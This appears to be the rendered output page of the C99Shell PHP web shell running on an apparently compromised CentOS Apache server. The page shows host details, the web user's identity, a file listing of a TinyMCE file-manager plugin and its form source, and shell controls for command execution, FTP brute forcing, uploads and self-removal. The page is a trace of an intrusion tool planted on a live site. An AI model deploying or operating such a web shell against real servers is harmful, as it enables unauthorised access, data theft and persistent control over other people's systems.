!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/lib/tinymce/plugins/ajaxfilemanager/   drwxr-xr-x
Free 9.29 GB of 93.48 GB (9.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ajax_save_as_form.php (1.71 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
    
require_once(dirname(__FILE__) . DIRECTORY_SEPARATOR "inc" DIRECTORY_SEPARATOR "config.php");
    
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>

<body>
        <a href="#" class="jqmClose" id="windowSaveClose"><?=  IMG_BTN_CANCEL?></a>
      <form id="formSaveAs" name="formSaveAs" action="" method="post">
        <table class="tableForm" cellpadding="0" cellspacing="0">
          <thead>
            <tr>
              <th colspan="2"><?=  IMG_LBL_SAVE_AS?></th>
          </tr>
        </thead>
        <tbody>
            <tr>
              <th>
                <label><?=  IMG_LBL_NEW_NAME?></label>
            </th>
            <td>
                <input type="text" id="new_name" class="input" name="new_name" value="" />
            </td>
          </tr>
          <tr>
              <th>
                <label><?=  IMG_LBL_SAVE_TO?></label>
            </th>
            <td>
                <select class="input" name="save_to">
                  
              </select>
            </td>
          </tr>
          <tr>
              <th>&nbsp;
            </th>
            <td>
            <span class="comments">*</span>
            <?=  IMG_NEW_NAME_COMMENTS?>
            </td>
          </tr>
        </tbody>
        <tfoot>
            <tr>
            <th>&nbsp;</th>
          <td><input type="button" class="button" value="<?=  IMG_BTN_SAVE_AS?>" onclick="return saveAsImage();" /></td>
          </tr>
        </tfoot>
      </table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0037 ]--